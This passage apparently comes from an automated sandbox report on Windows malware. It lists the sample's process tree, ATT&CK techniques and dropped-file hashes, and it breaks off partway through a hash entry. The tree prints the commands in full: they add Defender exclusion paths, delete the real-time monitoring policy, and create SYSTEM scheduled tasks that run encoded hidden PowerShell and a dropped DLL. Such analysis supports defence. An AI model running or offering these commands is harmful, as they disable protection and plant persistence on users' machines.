C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
2⤵
PID:3048

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1708

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
2⤵
PID:1988

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1672

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
2⤵
PID:300

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1112

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
2⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1912

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf"
2⤵
PID:592

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf"
2⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:1924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:3052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:1576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
3⤵
- Windows security bypass
PID:2524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
3⤵
- Windows security bypass
PID:2348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3016

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDvErlGsJ" /SC once /ST 05:00:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:988

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDvErlGsJ"
2⤵
PID:2440

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDvErlGsJ"
2⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
2⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:2708

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
2⤵
PID:2008

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:1844

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PihIjSYIYOWYivaIO"
2⤵
PID:1924

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PihIjSYIYOWYivaIO"
2⤵
PID:2844

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PihIjSYIYOWYivaIO2"
2⤵
PID:2596

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PihIjSYIYOWYivaIO2"
2⤵
PID:2856

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uBIqNqVTLsdVwtoMO"
2⤵
PID:2712

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO"
2⤵
PID:2672

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uBIqNqVTLsdVwtoMO2"
2⤵
PID:2588

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO2"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zufPyHRvXFwOAoMLceE"
2⤵
PID:2984

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE"
2⤵
PID:3052

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zufPyHRvXFwOAoMLceE2"
2⤵
PID:2004

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE2"
2⤵
PID:756

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ALSnKDtOkAsKnYIkHVn"
2⤵
PID:1188

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn"
2⤵
PID:1620

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ALSnKDtOkAsKnYIkHVn2"
2⤵
PID:1372

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn2"
2⤵
PID:2344

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fErPICTAIBeQfSA" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2432

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iyUHVhEGVwjqNkM"
2⤵
PID:2424

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iyUHVhEGVwjqNkM"
2⤵
PID:1008

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iyUHVhEGVwjqNkM2"
2⤵
PID:2188

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iyUHVhEGVwjqNkM2"
2⤵
PID:1508

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oRuAcxXUHxbxlS"
2⤵
PID:1692

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oRuAcxXUHxbxlS"
2⤵
PID:2352

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PTILZxjmSMqDI"
2⤵
PID:2404

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PTILZxjmSMqDI"
2⤵
PID:1552

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PTILZxjmSMqDI2"
2⤵
PID:2116

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PTILZxjmSMqDI2"
2⤵
PID:2808

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "fErPICTAIBeQfSA2" /F /xml "C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2300

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fErPICTAIBeQfSA"
2⤵
PID:2956

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fErPICTAIBeQfSA"
2⤵
PID:2724

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DHYuWKgDMKXBLX" /F /xml "C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2924

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YnGKDWXrXurgq2" /F /xml "C:\ProgramData\jbMfBZnRCYwXWnVB\yDOGyZX.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1728

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uBIqNqVTLsdVwtoMO2" /F /xml "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1188

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ALSnKDtOkAsKnYIkHVn2" /F /xml "C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 268
2⤵
- Program crash
PID:236

C:\Windows\system32\taskeng.exe
taskeng.exe {1ABF180B-9726-4A10-8976-67692C051CDA} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
1⤵
PID:844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2416

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2348

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2864

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2132

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml
Filesize
2KB

MD5
eda91a0f391eb42e15dfdbfd829837cb

SHA1
b25730ff454a76132a27f873c9e4175785801a30

SHA256
dede05112c969db28dca57b8691fd9da2b5cd40942a8e6a3fdf4d09d65cc8d0e

SHA512
ef4b8d293cfc6b482f1bb9e704bab62b796a048425c6fc27624e2b5e4b214c6aaf7caed0f43399b70b186ca9bfb4f0f39eee2b372f04839b524f8d5f41331f04

Download Submit
C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml
Filesize
2KB

MD5
8e7fb4e07f24fe3167b8322ca19f2c15

SHA1
548b70484f8b36ab228979a36644dd80d7419625

SHA256
76139a976e7cc1b392c856109554184e6d0d6fd3d9b8d7706043e9b6f764cf54

SHA512
9e3ded44410598ffccfa504b1b7c0c27ecb972a8c32b0f1d1b5c433b419ee4e65e80d8a59d40c347607e9c1a0a11fdd7021c8012ac1793463178a7e57d0e2bff

Download Submit
C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml
Filesize
2KB

MD5
aa8e2a43be01988ab61cadae768beab2

SHA1
43dcc3879d9db299db64f2b22c10eee528f4b85f

SHA256
60d0045073143f8187ba36e8c891eda54b001ed62c1fd48e18410370339f8d1b

SHA512
56e54f2628587bd54792f8eae75319478022c02727552007f850a62788b9d7ac0b1c21feca7142644f549943be91f4c569673595aa8351c1200f3cc86159cc00

Download Submit
C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml
Filesize
2KB

MD5
868ef0349be864a6facc3fc454ead3ab

SHA1
f44dd664ce7d33c82d66292ab5bcbc2485bd2daf

SHA256
83c74debb70dae9bbc540d50ab2334a3a1145d6ded3aa2839ac0ca81f41d28bf

SHA512
fa23cb8869a09aa641ba3ba6d29916c448627bfa77abdc806cadb32143fb674e64fa3c26cc1bba08ab76d756f0787be72cc30f0bf47380b12c17813bb623e2a0

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi
Filesize
641KB

MD5
ac50bd0140816e5b418804edbc3e1872

SHA1
efe2e39b9b58f41bb83a1eb2904b0f8ed5845bee

SHA256
5c1da4d6a7b24bfc09b8cc44cbfa3b0c050a3fdd22a356900cae35ea1aa832ad

SHA512
b9a1777f9acba104812ced2267c47cc83273cd7450fc7b57928804d6528e4098d8afc3c6be6bb02d39bf3d410292a3dfd90b220fbc01a311824da50ab50be156

Download Submit
C:\ProgramData\jbMfBZnRCYwXWnVB\yDOGyZX.xml
Filesize
2KB

MD5
f8689470aa0280ae17c8a02774f07de1

SHA1
78122f485a6984a8c3a5720abe7192bcc3790f53

SHA256
ebe665f769a13bdb1492142ccfd60a00bc59be7152cb808f71faebf676987f8f

SHA512
47bfc2b55d5e867456f87fb86f2f591e3fe3ae54ef2d2bcc006a4e91ce0103f0a326d09d79c90e5038f67164461faf3f10c03c7a4122ddd17108fd2ce05e2d47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\en\messages.json
Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\pt_BR\messages.json
Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b37e97501563e623f97a96d35697d0dc

SHA1
b4f9bb5576fade006ef1fcec299f94a57ef10e6c

SHA256
5738c5af409cdab1be8c947d1506733b53757145b697a2b4ee9181591de493fa

SHA512
966c51a69c9f2ec41877033711158ec24dca88359ab41b50d2fb15a1f41f372134f093aa2104e090f88d35a70003831d836fb27f19c6a404e4fb731baeb1c769

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQ3OO131FZAU599IQTD0.temp
Filesize
7KB

MD5
8f171088924e815e20baa0530ee80240

SHA1
3688b84f9bb8c7556b0121b413cfe04a9545c1d6

SHA256
ef2f58da2a3f67df329277c53da59228b71345c21b453b5392113eb4c1c61103

SHA512
eb6881608c79001a07a56d57fea619b9d9c5332757ebe1b15f62c8080dd38e220d4886f7ae81464040ef6dc00d095ca876be01b68df94161700297bcf9258e73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR0879EQDU4B5W6WZF9D.temp
Filesize
7KB

MD5
838c686a6d7375bca89fe219cd76e438

SHA1
0326ba5340de4ad42853b3035444cb8aa9d98065

SHA256
37b98532a6492750ed8d3fb6a54404f15f4b6d43d1258e020eadc19e37d30013

SHA512
efc24f5f64454ef1d0dd9fbcabcb5e92422e6990aeea8410af7783ad007f52d17a246bfdcf4caa686c37d2cf5a1afe30a18a1c7fe4d8379946370741007a42e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
aee1ca77323a663cd0f73dab6cd324df

SHA1
b3742864f08d92b8aa682c6a6d5fa68b035f2f69

SHA256
e010e6f0b8e54664aecdf43295666a23d566dc297e0ad37b5d335094a37bdc69

SHA512
e1c49f21fe4885def24d6bf44cd0d5c6557ac12a7bcb064e31a5f406201b2ed38e0915856dac58aa8a0470ff8fa564864f0234763722dd9807cd2d665abacb33

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ox017b3g.default-release\prefs.js
Filesize
6KB

MD5
19666b4dfb8e18cc31339b7bb37c7303

SHA1
